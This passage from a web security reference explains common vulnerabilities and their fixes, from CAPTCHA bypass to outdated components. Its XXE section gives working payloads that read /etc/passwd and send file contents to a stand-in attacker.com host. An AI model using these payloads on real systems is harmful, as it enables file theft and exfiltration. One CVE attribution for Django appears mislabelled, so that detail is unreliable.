  • Reused Token: The CAPTCHA token is only validated once on the server side and not invalidated afterward, letting attackers reuse a solved challenge repeatedly.
  • Predictable IDs: If the CAPTCHA's image filenames or parameter strings follow a pattern (e.g., incrementing IDs), attackers may guess and fetch the corresponding solutions.

Client-Side Validation Only

When CAPTCHA verification happens solely in client-side code (e.g., JavaScript), attackers can simply bypass or disable the check. They may manipulate the browser DOM or intercept requests to remove or override the CAPTCHA requirement.

Weak Image/Audio Complexity

If the images or audio challenges are easy to parse, automated OCR or speech-to-text tools can solve CAPTCHAs at high accuracy:

  • Low Distortion: Simple image CAPTCHAs with few overlapping letters or minimal noise are readily solved by modern OCR libraries.
  • Predictable Background: Uniform or lightly varied backgrounds make text extraction straightforward.
  • Simple Audio Challenges: Speech-to-text engines can interpret unmasked spoken digits or phrases with ease.

Human-in-the-Loop Attacks

Attackers often outsource CAPTCHA solving to real human operators:

  • Crowdsourced Services: Attacker scripts forward CAPTCHA challenges to services or "mechanical turk" platforms where low-cost labor solves them rapidly.
  • Phishing or Proxy Tactics: Attackers redirect CAPTCHAs to unsuspecting users (e.g., on a phishing site) who unwittingly solve the challenge for the attacker.

Remediation

  1. Server-Side Enforcement and Validation

    • Validate CAPTCHA tokens exclusively on the server, invalidating them after one use.
    • Do not rely on client-side scripts alone for verifying CAPTCHA results or toggling form submission logic.
  2. Use Secure and Evolving CAPTCHA Mechanisms

    • Employ modern CAPTCHAs that incorporate advanced distortion techniques, multiple challenge types, or adaptive difficulty (e.g., reCAPTCHA).
    • Regularly update and rotate CAPTCHA libraries to stay ahead of automated solvers.
  3. Rate Limiting and Behavior Analysis

    • Implement rate limiting or IP-based throttling to reduce the impact of repeated CAPTCHA bypass attempts.
    • Track user behavior, such as mouse movements or interaction patterns, to detect and block automated scripts.
  4. Short Expiration and Non-Predictable Tokens

    • Generate unpredictable, cryptographically secure tokens for each CAPTCHA instance.
    • Set short expiration times to prevent token reuse or replay attacks.
  5. Multi-Factor or Additional Security Layers

    • Combine CAPTCHAs with other security controls, like email/phone verification or device fingerprinting.
    • Consider multi-factor authentication (MFA) for sensitive actions, minimizing reliance on CAPTCHAs alone.

Lack of Rate Limiting

Description

Lack of Rate Limiting (also known as insufficient request throttling) is a vulnerability where a web application or API allows users to make an unlimited number of requests over a short period without restriction. This oversight enables attackers or malicious bots to perform high-volume actions such as brute-forcing credentials, spamming, or launching denial-of-service attacks. Without rate limits, an application may become overwhelmed or experience performance degradation, leading to service outages or unauthorized access to user accounts.

Rate limiting typically involves applying thresholds on how many requests a user (or IP address) can make within a defined timeframe. When these limits are not in place, attackers can systematically abuse application functionality faster than most protective measures or manual detection methods can respond.

Examples

Brute-Force Attacks on Login Pages

If an attacker can attempt thousands of username-password combinations in quick succession, they have a higher chance of guessing valid credentials. Without rate limiting or lockout mechanisms, the attacker faces virtually no barriers.

Enumeration of User IDs or Resources

When an API endpoint allows fetching resource details by ID without restricting request volume, an attacker can quickly loop through possible IDs (e.g., incrementing integers) to scrape sensitive or proprietary information.

Denial-of-Service (DoS) or Resource Exhaustion

Bots or malicious scripts can repeatedly request resource-intensive pages or functions. If the server is unable to throttle the requests, it may become overloaded, impacting legitimate users.

Automated Form Submission and Spam

Forms that accept user-generated content (e.g., comments, posts, messages) can be flooded with spam or malicious links if an attacker can submit them without frequency limits.

Remediation

  1. Implement Request Throttling

    • Use built-in or third-party libraries that monitor request rates and block or delay requests exceeding configured thresholds.
    • Apply thresholds based on IP address, session tokens, or user accounts to prevent large bursts of requests.
  2. Introduce Account Lockouts or Captchas

    • Temporarily lock or challenge user accounts (e.g., via CAPTCHA) after repeated failed login attempts.
    • This step significantly increases the time and effort required for brute-force attacks.
  3. Enforce Strong Authentication and Password Policies

    • Encourage or enforce robust passwords and MFA to reduce the likelihood that brute-force attacks will succeed, even if rate limiting is not fully restrictive.
    • This is a complementary safeguard alongside rate limiting.
  4. Monitor and Alert on Anomalous Traffic

    • Use logging, analytics, and anomaly detection tools to identify surges in request volume or patterns indicative of automated scripts.
    • Generate alerts for high frequencies of requests targeting specific endpoints, allowing administrators to take action quickly.
  5. Layered Approach with Web Application Firewalls (WAF)

    • Configure WAF rules to detect and mitigate excessive requests or repeated patterns aimed at sensitive endpoints.
    • Block or throttle abusive IP addresses or suspicious traffic sources.

Sensitive Data Exposure

Description

Sensitive Data Exposure occurs when an application inadvertently discloses confidential or personal information, such as passwords, credit card details, health records, or proprietary business data. This can happen due to improper encryption (or lack thereof), insecure data storage, or insufficient access controls. Attackers exploit these weaknesses to gain unauthorized access to data in transit (e.g., via unsecured HTTP connections) or data at rest (e.g., unencrypted databases, configuration files).

When sensitive data is exposed, the consequences may include identity theft, financial fraud, regulatory penalties, and harm to an organization's reputation. Common causes include failing to use HTTPS, storing passwords in plaintext, or using weak encryption algorithms.

Examples

Unencrypted Connections

If a website transmits login credentials over HTTP rather than HTTPS, an attacker can intercept the data using sniffing tools on the same network. The credentials are then exposed in plaintext.

Plaintext Password Storage

Some applications store user passwords directly in a database without hashing or encryption. If an attacker gains access to the database, they can read every user's password. This also compromises users who reuse passwords on multiple sites.

Sensitive Tokens in URLs or Logs

Applications sometimes include session tokens, API keys, or access tokens within URL parameters. These tokens can appear in server logs, browser history, or referrer headers, exposing them to unintended recipients.

Weak or Deprecated Cryptographic Algorithms

Even if data is encrypted, using older or broken algorithms (e.g., MD5, SHA1, RC4) leaves that data vulnerable to well-known attack methods. Attackers can potentially decrypt or forge data if algorithms lack sufficient cryptographic strength.

Remediation

  1. Use Strong Encryption (Transport Layer Security)

    • Always serve sensitive pages (login, account management) over HTTPS.
    • Prefer TLS 1.2 or higher with secure cipher suites to protect data in transit from eavesdropping and tampering.
  2. Encrypt Sensitive Data at Rest

    • Store passwords using salted, one-way hashing functions (e.g., bcrypt, Argon2, scrypt).
    • For other sensitive data (e.g., financial or healthcare records), use robust encryption methods (e.g., AES-256) with secure key management.
  3. Avoid Storing Tokens in Logs or URLs

    • Do not include session IDs, API keys, or other secrets in query parameters. Instead, place them in secure HTTP headers or request bodies.
    • Ensure sensitive data is either masked or omitted in application logs, especially if they might be accessed or shared.
  4. Regularly Update Cryptographic Measures

    • Decommission weak or deprecated algorithms and protocols (SSLv3, TLS 1.0, MD5, etc.).
    • Stay informed about emerging cryptographic vulnerabilities; patch or upgrade your systems promptly.
  5. Implement Strict Access Controls

    • Restrict database access to only authorized users and processes.
    • Apply the principle of least privilege to both your application code and infrastructure.

Denial of Service (DoS)

Description

A Denial of Service (DoS) attack aims to render a network or application resource unavailable to its intended users. Attackers typically overwhelm the target with excessive requests, resource-intensive tasks, or exploit a bottleneck in the system's design, causing partial or complete service interruption. This can result in significant downtime, financial losses, and damage to an organization's reputation.

DoS attacks often exploit insufficient resource management or concurrency controls. A single endpoint that triggers an expensive database query, or a file upload function lacking size restrictions, can become a bottleneck when abused by an attacker. In more severe cases, a Distributed Denial of Service (DDoS) employs multiple hosts to send massive traffic simultaneously, making it harder to distinguish legitimate traffic from malicious overload attempts.

Examples

Volumetric Flooding

Attackers generate a high volume of traffic (e.g., HTTP GET requests) to saturate a server's network bandwidth or processing capacity. Without proper rate limiting or filtering, the server becomes overwhelmed and unable to handle legitimate requests.

Resource-Intensive Endpoints

Some requests—such as complex database queries, file compression, or image resizing—require significant CPU or memory. Attackers can exploit these endpoints by sending repeated or large requests, causing the system to run out of resources.

Slowloris (Slow HTTP Attacks)

Attackers keep many connections open by sending partial HTTP requests slowly, preventing the server from closing these connections. Over time, the server runs out of available connections, denying new incoming legitimate requests.

Application Logic Loops

If an application has a poorly designed workflow (e.g., redirect loops or nested operations triggered by a single request), attackers can craft requests that repeatedly trigger resource-heavy processes, resulting in denial of service.

Remediation

  1. Rate Limiting and Throttling

    • Enforce limits on how many requests an IP or user can make within a specific time window.
    • Configure backoff algorithms or request queuing to balance incoming traffic.
  2. Use a Content Delivery Network (CDN)

    • Offload static content (images, scripts, styles) to CDN nodes, reducing the load on your origin server.
    • Many CDNs also provide DDoS protection, filtering out malicious traffic before it reaches your server.
  3. Implement Resource Constraints

    • Configure maximum file upload sizes, limit recursion or loop depth in server-side code, and ensure timeouts for long-running requests.
    • Use defensive measures like circuit breakers or graceful degradation to keep the system responsive under heavy load.
  4. Apply Web Application Firewall (WAF) and Intrusion Detection

    • Deploy WAF rules to identify and block known DoS patterns or suspicious traffic spikes.
    • Use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) to monitor and mitigate threats in real time.
  5. Scalable Infrastructure

    • Design your application to scale horizontally, adding more servers or containers as traffic grows.
    • Use load balancers that distribute requests evenly and detect overloaded instances.

Security Misconfiguration

Security Misconfiguration occurs when applications, servers, or frameworks are deployed with insecure default settings, exposed configurations, or improperly set permissions, making them vulnerable to attacks. These misconfigurations often result from unnecessary features, excessive privileges, outdated software, or lack of security hardening, leading to data leaks, unauthorized access, and system compromise.

Common Vulnerabilities:

- Exposed Debug or Error Messages Containing Sensitive Information
- Default Credentials or Weak Authentication Configurations
- Overly Permissive Permissions on Files, Directories, or Cloud Resources
- Unpatched or Outdated Software with Known Vulnerabilities
- Misconfigured Security Headers (Missing CSP, HSTS, or X-Frame-Options)
- Unrestricted Access to Admin Panels or APIs

To mitigate these risks, applications should disable unnecessary features, enforce secure authentication and access controls, regularly update and patch software, configure security headers properly, and perform security audits to detect misconfigurations. Automating configuration management and using security baselines can further reduce exposure to misconfigurations.

XML External Entity (XXE)

Description

XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to external entities. By manipulating these external entity declarations, attackers can read local files, initiate network requests from the server, or in more severe cases, achieve remote code execution. XXE typically exploits parsing libraries or features in XML processors that automatically retrieve external resources without sufficient validation or restriction.

These attacks are particularly dangerous because XML parsers, by default, may expand entities, download remote content, or even parse system files. If an attacker can control or supply XML data (e.g., via file uploads or API calls), and the server does not securely configure its XML parser, the attacker can exploit XXE to exfiltrate sensitive data or interact with internal services.

Examples

Classic XXE Payload

A typical XXE attack might embed a DOCTYPE declaration that references a system file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure XML parser processes this, it attempts to read /etc/passwd from the server's file system, then includes its content in the parsed output. The attacker can thereby access sensitive local files.

Blind XXE Over HTTP

Attackers can force an XML parser to load an external resource from a remote server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/secret?file=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Even if the application's response does not directly return the file contents, the attacker's server receives a request that leaks metadata (like which files exist or open ports) or exfiltrates data, depending on the parser's behavior.

Parameter Entity Injection

Some XML parsers allow parameter entities in the DTD, which can be used to smuggle malicious payloads or access environment variables:

<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?host=%file;'>">
  %eval;
]>
<root>&exfil;</root>

This sequence can initiate network requests containing sensitive server data to an external URL.

Remediation

  1. Disable External Entity Resolution

    • Configure the XML parser to disallow or ignore external entities.
    • For example, in Java, disable DTDs and set XMLConstants.FEATURE_SECURE_PROCESSING to true.
    • Each language or parser typically offers parameters or flags to turn off external entity expansion.
  2. Use Less Complex Data Formats

    • Where possible, avoid using XML and its complex features.
    • Consider JSON or other formats that do not include entity expansion by default, reducing attack surface.
  3. Implement Whitelisting and Validation

    • If external entities are strictly required, configure a whitelist of allowed resources or schemas.
    • Validate XML input against a secure schema that disallows external references.
  4. Enforce Least Privilege and Sandboxing

    • Run the application with minimal file system and network privileges so that even if XXE is attempted, it has limited access to files or internal endpoints.
    • Use containerization or chroot environments to restrict the application's view of the file system.

Default Configurations

Description

Default Configurations refer to the out-of-the-box settings, credentials, or functionality provided by software, frameworks, or systems upon initial installation. These default settings often prioritize ease of setup and might not be sufficiently hardened for a production environment. Attackers capitalize on well-known default usernames, passwords, configurations, or open ports to gain unauthorized access or to perform further exploits.

Developers and system administrators frequently overlook changing these defaults during deployment, leaving sensitive services exposed with predictable or weak security settings. By using publicly available documentation or scanning tools, attackers can quickly identify systems running default configurations and compromise them with minimal effort.

Examples

Default Administrative Credentials

Some content management systems (CMS), routers, or database servers ship with credentials like admin/admin or root/root. If administrators do not promptly replace these credentials, attackers can easily log in and gain control over the system.

Unsecured Default Ports or Protocols

Common services or software might run on their default ports with no authentication requirements (e.g., unauthenticated database ports, open debugging interfaces). Attackers can scan the network to locate these services and exploit them if no additional security measures are in place.

Misconfigured Web Application Frameworks

In certain web frameworks, sample pages or APIs are enabled by default for demonstration. These sample endpoints can expose debug information, version details, or even privileged actions. If they remain active in production, attackers can probe them for vulnerabilities.

Remediation

  1. Change Default Credentials Immediately

    • Upon installation, update all administrator and service accounts with strong, unique passwords.
    • Disable or remove any default or guest accounts not actively in use.
  2. Harden Configuration Settings

    • Review and configure each service's security options – enable authentication mechanisms, restrict permissions, and implement secure communication protocols.
    • Disable or remove default "example" applications, sample endpoints, or test data that are not needed in production.
  3. Restrict Network Access

    • Limit access to sensitive ports by using firewalls, security groups, or network segmentation.
    • Close or change default ports where possible to obscure standard attack vectors.
  4. Follow Vendor and Community Best Practices

    • Consult official documentation or trusted community guidelines on securing the specific software or service.
    • Stay informed about known default settings or vulnerabilities and apply recommended mitigations or patches.

IIS Tilde Enumeration

Description

IIS Tilde Enumeration (sometimes referred to as the IIS Short Filename Vulnerability) leverages how Windows systems historically support 8.3 short filenames. When running Microsoft Internet Information Services (IIS), attackers can use requests referencing truncated directory or file names that include a tilde character (~), such as FOLDER~1, to probe for the existence of hidden directories or files. By systematically guessing these short names, an attacker may discover sensitive paths or filenames that should not be publicly exposed.

This issue stems from legacy DOS-compatible naming schemes in Windows. If short filename creation is enabled on the file system, each long filename also has an 8.3-compatible alias. IIS, depending on its configuration, may respond differently when a correct or incorrect short name is requested, thus exposing otherwise undisclosed directory or file structures.

Examples

Discovering Hidden Folders

If the legitimate folder on the server is SecretAdmin, the 8.3 short name might be SECRE~1. An attacker might probe the server with URLs like:

GET /SECRE~1/ HTTP/1.1
Host: example.com
  • If the server responds with a 200 OK (or a 403/401 implying it exists but is restricted), the attacker learns the folder likely exists.
  • If it responds with a 404 Not Found, the guess was incorrect and they move on to another short name guess.

Enumerating File Names

Similarly, if a file is named ImportantConfig.txt in the Config directory, the attacker might test requests for IMPOR~1.TXT in that directory:

GET /Config/IMPOR~1.TXT HTTP/1.1
Host: example.com

Differences in the server's response codes or error messages can reveal the presence of that file even if it is not directly linked anywhere on the site.

Remediation

  1. Disable 8.3 Filename Creation

    • If your Windows version and application setup allow it, you can disable 8.3 short file name generation on new volumes using registry settings or system policies.
    • (Be mindful that changing this setting may impact legacy applications.)
    • For example, on some Windows systems, you can modify:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
    NtfsDisable8dot3NameCreation = 1
    
  2. Apply Security Patches and Updates

    • Ensure you are running a fully updated version of IIS and Windows.
    • Microsoft has released updates over time that reduce the leak of file or directory info via the short name mechanism.
  3. Restrict Folder and File Access

    • Use proper Access Control Lists (ACLs) to lock down sensitive directories and files, preventing unauthorized access even if short filename enumeration reveals their existence.
    • Set up robust authorization checks within IIS to ensure only intended users can access critical resources.

Verbose Error Messages

Description

Verbose Error Messages occur when an application reveals overly detailed information about its internal processes, configurations, or database schemas in error responses. While error reporting and debugging are essential during development, leaving them active in a production environment can expose sensitive details such as stack traces, SQL queries, server file paths, or system configuration settings. Attackers can leverage this information to identify potential vulnerabilities, refine their exploit attempts, or gain insights into the system's structure.

Excessive detail in error messages can arise from default framework configurations, unhandled exceptions, or logging/monitoring tools that are not tailored for production use. Ensuring that public-facing errors remain generic—while still logging useful data in a secure location—is crucial for preventing information leakage.

Examples

Unhandled Exception Stack Traces

An application might throw a runtime exception that returns a full stack trace to the user's browser. For instance, a .NET or Java error page shows class names, line numbers, and even library versions. Attackers can identify the framework in use, discover the file structure, or pinpoint the vulnerable method.

Database Query Errors

When a SQL query fails, an application may respond with a detailed message such as:

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in 
your SQL syntax near 'FROM users WHERE id= ' at line 1

This reveals the query structure (e.g., table names, SQL fragments), giving attackers a blueprint for SQL injection attempts.

Configuration or Path Leakage

In some error conditions, the application could reveal file system paths or server configuration details (e.g., /var/www/myapp/config.php). Attackers can use these paths to probe for specific files or gather more details about the server's environment.

Remediation

  1. Customize and Restrict Error Messages

    • Display user-friendly, generic error messages in production environments that do not disclose technical details.
    • Provide only high-level information such as "An unexpected error has occurred" or "Unable to process your request."
  2. Secure Exception Handling

    • Implement global exception handlers or middleware that catch errors and manage how they are displayed to end-users.
    • Use structured logging to record the full stack trace or debug info internally but do not show it publicly.
  3. Use Different Configurations for Development and Production

    • In frameworks like Django, Rails, or Express, ensure that debug settings are disabled in production.
    • Production mode typically suppresses verbose error messages and stack traces by default.

Stack Traces

Description

Stack traces provide detailed information about a program's execution path at the moment an exception or error occurs. In a development environment, this information is invaluable for debugging, showing which functions were called, on which lines errors occurred, and sometimes which libraries or framework versions are in use. However, when applications expose stack traces in production, attackers can glean critical details about server configurations, file paths, database structure, or underlying frameworks. This in-depth insight can be used to plan targeted attacks, exploit known vulnerabilities, or map out potential points of entry.

Often, stack trace exposure stems from misconfigured error-handling settings, unhandled exceptions, or debug modes inadvertently left enabled in a live environment. Minimizing or hiding these traces from end users (while still logging them securely for developers) is a key practice in application security.

Examples

Full Framework Trace

A Java application throws a NullPointerException that's not caught by any custom error handler, causing a default Tomcat/Java error page to be displayed:

java.lang.NullPointerException
    at com.example.app.UserService.getUserById(UserService.java:45)
    at com.example.app.UserController.handleRequest(UserController.java:67)
    ...

This reveals class names, method names, and file locations. Attackers learn about the application's internal package structure, potentially identifying classes or services that may have known vulnerabilities.

Python Traceback with Library Versions

A Flask application running in debug mode returns a detailed Python traceback, including environment details:

Traceback (most recent call last):
  File "/path/to/flask/app.py", line 200, in create_user
    user = User(name=request.form['username'])
KeyError: 'username'

In addition to code specifics (like line numbers), the traceback may display the versions of Python, Flask, or other libraries—helping attackers check for unpatched vulnerabilities in those dependencies.

Hidden Configuration Data

Sometimes stack traces include environment variables or sensitive connection strings if these variables are referenced directly in the error path. For instance, a database connection error might display the full connection URL, username, or partial passwords.

Remediation

  1. Use Production-Grade Error Handling

    • Disable debug or developer modes in production. Many frameworks (Spring Boot, Express.js, Django, Rails) offer a separate production configuration that suppresses stack traces in user-facing responses.
  2. Implement Custom Error Pages

    • Catch and handle all exceptions within application code or through a global error-handling mechanism (middleware, filters, decorators).
    • Provide only generic error messages to the user, such as "An error occurred" or "Something went wrong."
  3. Log Internally, Not Publicly

    • Store detailed stack traces and debug logs in server-side log files or centralized logging systems (e.g., ELK stack, Splunk).
    • Ensure these logs are only accessible to authorized administrators or developers.

Server Fingerprinting

Description

Server Fingerprinting is the process by which an attacker (or researcher) gathers information about a server's software, operating system, and version details—often through subtle indicators in responses or network behavior. This information can then be used to identify known vulnerabilities, tailor exploit strategies, or bypass certain security controls. Common ways of performing server fingerprinting include analyzing HTTP response headers, banners, error messages, and TLS/SSL handshakes, as well as using specialized scanning tools that probe multiple protocols.

In environments where default server banners are left intact or where HTTP headers explicitly declare software versions, attackers can quickly recognize the server type and version (e.g., "Apache/2.4.41 (Ubuntu)"). Even slight timing differences in responses or unique quirks in the way a server handles malformed requests can serve as a signature for advanced fingerprinting techniques.

Examples

HTTP Banner Disclosure

Some web servers or frameworks include version details in their HTTP response headers:

Server: Apache/2.4.41 (Ubuntu)

An attacker who sees "Apache/2.4.41" might check for any known security vulnerabilities associated with that version of Apache, increasing the likelihood of a successful exploit.

Error Page Signatures

When an unhandled exception or error occurs, the server might return a page indicating the software stack and version (e.g., Tomcat 9.0.37, Nginx 1.18.0). Attackers use these clues to pinpoint the exact environment, guiding further attacks or zero-day exploit searches.

TLS/SSL Handshake Anomalies

By analyzing the order or type of ciphers and extensions offered during a TLS handshake, sophisticated scanners can guess which server or library version (e.g., OpenSSL, GnuTLS, or Microsoft SChannel) is in use, thereby identifying potential cryptographic vulnerabilities.

Remediation

  1. Obscure or Remove Version Information

    • Configure servers to suppress or modify the Server header or any banner strings that reveal the software version.
    • Use generic header values (e.g., "Server: Apache") or remove them entirely if the application still functions correctly without disclosing version details.
  2. Handle Errors with Generic Responses

    • Implement custom error handling so that stack traces, server names, or framework identifiers are not exposed.
    • Provide user-friendly but generic error messages, and log details internally instead of revealing them in public responses.
  3. Harden TLS/SSL Configuration

    • Update or replace outdated cryptographic libraries and ensure only modern ciphers are used.
    • Periodically scan your TLS configuration with security tools to see which ciphers or protocol versions might reveal underlying server libraries.

Cookie Flags

Description

Cookie Flags are security attributes that can be set on HTTP cookies to control their behavior and reduce security risks. Improperly configured cookie flags can leave an application vulnerable to various attacks, such as session hijacking, cross-site scripting (XSS) exploitation, and man-in-the-middle (MitM) attacks. Without the correct flags, an attacker might be able to steal authentication cookies, manipulate session data, or execute unauthorized actions on behalf of a user.

Cookies are often used for authentication (e.g., session tokens), user preferences, or tracking. Ensuring that security flags are set correctly is crucial for preventing unauthorized access and data leakage.

Examples

Missing HttpOnly Flag

If the HttpOnly flag is not set, JavaScript running in the user's browser can access the cookie via document.cookie. This makes it possible for an attacker to steal the session token using an XSS attack:

<script>
  alert(document.cookie);
</script>

If the session cookie is accessible in JavaScript, an attacker could exfiltrate it and hijack the session.

Missing Secure Flag

If a cookie lacks the Secure flag, it can be transmitted over unencrypted HTTP connections. This makes it susceptible to packet sniffing or MitM attacks, where an attacker intercepts the cookie data.

Example of an insecure cookie:

Set-Cookie: sessionid=abcd1234; Path=/; HttpOnly;

Without Secure, the cookie is sent over both HTTP and HTTPS. If an attacker can force the user to make an HTTP request, they might capture the cookie.

Missing SameSite Flag

The SameSite flag prevents Cross-Site Request Forgery (CSRF) attacks by restricting when cookies are sent with cross-site requests. If this flag is not set or is configured as SameSite=None without Secure, attackers can exploit CSRF vulnerabilities to perform actions on behalf of an authenticated user.

Example of a cookie missing the SameSite flag:

Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly;

In this case, the cookie may still be sent with cross-site requests, allowing CSRF attacks.

Remediation

  1. Set HttpOnly to Prevent XSS-Based Theft

    • Ensures cookies are not accessible via JavaScript, preventing attackers from stealing session tokens through XSS.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; HttpOnly;
    
  2. Use Secure to Encrypt Cookie Transmission

    • Ensures the cookie is only sent over HTTPS and prevents interception over unencrypted HTTP traffic.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly;
    
  3. Enforce SameSite for CSRF Protection

    • Use SameSite=Lax or SameSite=Strict to prevent cross-site cookie transmission, mitigating CSRF attacks.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly; SameSite=Lax;
    
  4. Set Domain and Path Restrictions

    • Limit cookies to specific subdomains or paths to reduce the risk of unauthorized access.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/account; Secure; HttpOnly; SameSite=Strict;
    

HTTP Headers

Description

HTTP Headers play a crucial role in web security by providing additional metadata about requests and responses between clients and servers. Misconfigured, missing, or weak security headers can expose web applications to various attacks, such as Cross-Site Scripting (XSS), Clickjacking, Man-in-the-Middle (MitM) attacks, and data leaks. Properly setting HTTP headers enhances the security posture of an application by enforcing secure communication, restricting browser behaviors, and mitigating common web vulnerabilities.

Without correctly configured security headers, attackers can manipulate responses, inject malicious scripts, or exploit browser-side weaknesses to compromise users and sensitive data.

Examples

Missing Strict-Transport-Security (HSTS)

The HTTP Strict Transport Security (HSTS) header ensures that browsers only connect to a site over HTTPS, preventing downgrade attacks and MitM attacks:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

If this header is missing, an attacker can force a user to visit the HTTP version of the site and intercept or alter the traffic.

Missing X-Frame-Options (Clickjacking Protection)

If an application allows framing inside <iframe> elements, attackers can create Clickjacking attacks that trick users into interacting with hidden UI elements.

To prevent this, the following header should be set:

X-Frame-Options: DENY

Without this, an attacker can embed the site within a malicious page and hijack user actions.

Missing X-Content-Type-Options (MIME Sniffing Attack Prevention)

Some browsers try to detect the content type of files even if the Content-Type header is present. This behavior, known as MIME sniffing, can be exploited to execute malicious scripts.

To prevent this, the following header should be set:

X-Content-Type-Options: nosniff

Without this, attackers can trick browsers into executing non-script files as JavaScript.

Weak or Missing Content-Security-Policy (XSS Prevention)

A missing Content Security Policy (CSP) allows attackers to inject malicious scripts via Cross-Site Scripting (XSS).

A strong CSP header should look like:

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random123'; object-src 'none'

Without this, malicious scripts injected into the site may execute in users' browsers.

Remediation

  1. Enforce HTTPS with HSTS

    • Prevents protocol downgrade attacks by ensuring all traffic is over HTTPS.
    • Recommended setting:
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    
  2. Prevent Clickjacking with X-Frame-Options

    • Blocks embedding of the site in iframes to prevent UI redress attacks.
    • Recommended setting:
    X-Frame-Options: DENY
    
  3. Block MIME Sniffing with X-Content-Type-Options

    • Ensures the browser respects declared Content-Type and doesn't execute non-script files as scripts.
    • Recommended setting:
    X-Content-Type-Options: nosniff
    
  4. Mitigate XSS with Content-Security-Policy

    • Restricts allowed sources for scripts, styles, and other content.
    • Example policy:
    Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random123'; object-src 'none'
    
  5. Enable Referrer-Policy for Privacy Protection

    • Controls how much referrer information is sent when navigating between sites.
    • Recommended setting:
    Referrer-Policy: strict-origin-when-cross-origin
    

Vulnerable and Outdated Components

Vulnerable and Outdated Components occur when applications rely on deprecated, unpatched, or insecure third-party libraries, frameworks, or dependencies, exposing them to known vulnerabilities. Attackers exploit these weaknesses to execute arbitrary code, escalate privileges, steal data, or compromise entire systems. Failing to update or patch components increases the risk of supply chain attacks and software exploits.

Common Vulnerabilities:

- Using Outdated or Unsupported Software with Known CVEs 
  (Common Vulnerabilities and Exposures)
- Failure to Apply Security Patches or Updates for Third-Party Libraries
- Relying on End-of-Life (EOL) Components No Longer Receiving Security Updates
- Use of Insecure Dependencies in Package Managers (e.g., npm, pip, Maven)
- Including Unverified or Malicious Third-Party Plugins, SDKs, or APIs
- Failure to Monitor for Security Advisories or Dependency Vulnerabilities

To mitigate these risks, organizations should regularly update software components, use automated dependency scanning tools (e.g., OWASP Dependency-Check, Snyk, Dependabot), verify the integrity of third-party packages, and apply security patches as soon as they are released. Implementing Software Composition Analysis (SCA) and enforcing strict version control policies can further reduce the risk of vulnerable components.

Usage of Vulnerable Components

Description

The Usage of Vulnerable Components occurs when an application incorporates third-party libraries, frameworks, plugins, or system dependencies that contain known security flaws. These components, whether open-source or proprietary, may have documented vulnerabilities (CVEs) that attackers can exploit to compromise applications, steal data, or execute malicious code.

Many organizations rely on third-party components for faster development, but failing to monitor and update them can introduce severe security risks. Attackers commonly scan applications for outdated versions of popular libraries or dependencies, using public exploit databases to identify known weaknesses. If these vulnerable components are not patched or replaced, an attacker may gain unauthorized access, execute arbitrary code, or manipulate system behavior.

Examples

Outdated Web Frameworks

Using an old version of a web framework can introduce serious vulnerabilities:

  • Spring Framework (Java) – Remote Code Execution (CVE-2022-22965)
    • An application using Spring 5.3.0 may be vulnerable to the Spring4Shell RCE exploit, allowing attackers to execute arbitrary code on the server.
  • Django – SQL Injection (CVE-2019-19844)
    • Older versions of Django before 3.0.10 were vulnerable to SQL injection due to improper query sanitization.

Vulnerable JavaScript Libraries (XSS & Prototype Pollution)

Front-end applications using outdated JavaScript libraries may be vulnerable to Cross-Site Scripting (XSS) or Prototype Pollution:

  • jQuery versions < 3.5.0
    • Vulnerable to XSS injection if unsanitized user input is passed to html().
  • Lodash versions < 4.17.21
    • Susceptible to Prototype Pollution, allowing attackers to modify object properties and potentially execute malicious scripts.

Unpatched System Components

Server-side components such as database systems, middleware, or web servers can also introduce vulnerabilities:

  • Apache Log4j (CVE-2021-44228 – Log4Shell)
    • A critical Remote Code Execution (RCE) vulnerability in Log4j versions < 2.15.0 allowed attackers to take control of affected servers by injecting malicious payloads in logs.
  • OpenSSL (CVE-2014-0160 – Heartbleed)
    • The infamous Heartbleed vulnerability allowed attackers to read sensitive memory contents, including encryption keys, from OpenSSL 1.0.1.

Remediation

  1. Monitor and Update Dependencies Regularly

    • Use dependency management tools to track and update vulnerable components:
      • npm audit fix (Node.js)
      • pip list --outdated (Python)
      • mvn versions:display-dependency-updates (Java Maven)
    • Ensure libraries and frameworks are updated to the latest stable versions.
  2. Conduct Regular Vulnerability Scans

    • Use Software Composition Analysis (SCA) tools to detect and manage vulnerable components:
      • OWASP Dependency-Check (Java, .NET, Python)
      • Snyk (Multiple languages)
      • GitHub Dependabot (Automated alerts for outdated dependencies)
  3. Replace Deprecated or Unmaintained Components

    • Avoid using libraries or frameworks that are no longer actively maintained.
    • If a component is unsupported, migrate to a more secure alternative.
  4. Implement Strict Version Control

    • Use dependency pinning (package-lock.json, requirements.txt) to prevent unintentional updates to vulnerable versions.
    • Avoid using wildcard versions (*, latest) in package management files.
  5. Apply Security Patches Immediately

    • Monitor security bulletins and CVE reports for critical updates affecting your software stack.
    • Automate patch management to reduce exposure to zero-day exploits.
  6. Enforce Secure Code Review and Testing

    • Integrate vulnerability detection into CI/CD pipelines to prevent deploying applications with known vulnerabilities.
    • Perform manual security reviews of third-party components before integrating them into production.

Identification and Authentication Failures

Identification and Authentication Failures occur when an application improperly implements authentication mechanisms, allowing attackers to compromise user accounts, bypass authentication, or exploit weak credentials. These vulnerabilities often result from weak password policies, missing multi-factor authentication (MFA), improper session management, or insecure credential storage, leading to unauthorized access, account takeovers, and data breaches.

